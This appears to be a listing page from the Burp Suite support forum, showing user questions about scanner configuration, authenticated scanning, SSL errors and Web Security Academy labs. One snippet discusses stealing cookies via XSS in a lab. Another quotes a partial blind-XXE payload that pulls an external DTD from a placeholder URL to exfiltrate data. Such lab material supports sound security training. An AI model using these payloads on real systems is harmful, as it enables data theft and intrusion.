How Do I?

  • How does Burp Suite Pro track this 'stranger' or assess my PC to prove my PC has been hac...

    Hi, I have a PC for penetration testing of an internal application, but I suspect my PC has been hacked by a stranger. How can Burp Suite Pro track this 'stranger' or assess my PC to prove my PC has been hacked?

    1 Agent Answer    0 Community Answer
    Nov 06, 2019 09:07AM UTC
  • Application Login Session

    During the manual audit/scan, why does Burp log out of the application under audit/scan? During the audit/scan, some of the requests are resulting in request timed out. Is this expected, and what could be the reason? During the audit/scan, is it necessary to maintain an active session of the application under scan, or does Burp have the capability to handle this automatically?

    1 Agent Answer    0 Community Answer
    Nov 06, 2019 05:37AM UTC
  • lab question

    How am I supposed to steal cookies from this lab, "Lab: Exploiting cross-site scripting to steal cookies", without having Burp Professional and without using the Burp Collaborator client? I've tried redirecting users to my site and making everyone that visits the blog post a comment, but neither of these two seems to work.

    5 Agent Answers    5 Community Answers
    Nov 05, 2019 01:44PM UTC
  • How to use burp with flutter based Android applications

    Any tips while pen-testing Flutter based Android apps? Since it ignores system proxy and user/system CA certificates you cannot use burp suite easily. I found a couple of blogs but they suggest patching etc. Is there any easy way? Here is the relevant info I found online. https://hackmd.io/@runicpl/flutter-android https://blog.nviso.be/2019/08/13/intercepting-traffic-from-android-flutter...

    1 Agent Answer    0 Community Answer
    Nov 05, 2019 01:07PM UTC
  • Authenticated Scanning and Javascript crawling

    Hi PortSwigger, how can I create a new active scan that can use either a session handling rule or other means to run an authenticated scan? My site doesn't use Basic Auth. It uses OAuth 2.0 for authentication. I also want to enable JavaScript crawling. I am using Burp Suite Professional 2.1.04. Thanks, --Jyothnsa

    1 Agent Answer    0 Community Answer
    Nov 05, 2019 12:44AM UTC
  • Burp Enterprise Support

    Hi Portswigger, For installing BurpSuite Enterprise for evaluation purpose, we are going with bare minimum requirements. The documentation shows this: Enterprise server machine Agent machine Base installation 10Gb of free disk space 16Gb of RAM 4 CPU cores 10Gb of fr...

    1 Agent Answer    0 Community Answer
    Nov 04, 2019 06:17PM UTC
  • Cross-site scripting (DOM-based)

    Burp has created 3 different DOM XSS issues with this description, with High Severity and Firm Confidence: The application may be vulnerable to DOM-based cross-site scripting. Data is read from window.location.hash and passed to the 'html()' function of JQuery. This is the static analysis: Data is read from window.location.hash and passed to the 'html()' function of JQ...

    1 Agent Answer    0 Community Answer
    Nov 02, 2019 06:26PM UTC
  • Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD

    Hi, I'm having trouble with this lab. I think I'm doing it right, but I'm not sure; every time I try it, nothing happens. So the challenge is that I need to use Burp Collaborator to get a DNS and HTTP response. I go to "Go to exploit server" and store my DTD file in the file. Then I get my URL and put it in this command: <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]> %x...

    1 Agent Answer    0 Community Answer
    Nov 02, 2019 08:06AM UTC
  • burp setting

    I use the Burp Professional version. I click new scan task, and it asks me to define crawling and auditing parameters. I use the default settings, and I can't find XSS and CSRF, so does any parameter need to be changed in the audit settings so we can discover CSRF and stored XSS?

    2 Agent Answers    2 Community Answers
    Nov 02, 2019 04:10AM UTC
  • Encountering javax.net.ssl.SSLException: Unsupported or unrecognized ssl message when crawling

    I have recently upgraded to Burp Suite Pro 2.1.04. Previously I could spider my application, but using the new crawler I immediately encounter the following exception and can't seem to get much further: javax.net.ssl.SSLException: Unsupported or unrecognized ssl message. I am running Burp on Windows Server 2016. I have installed the Burp certificate in Chrome and am proxying web traff...

    2 Agent Answers    1 Community Answer
    Nov 01, 2019 06:59PM UTC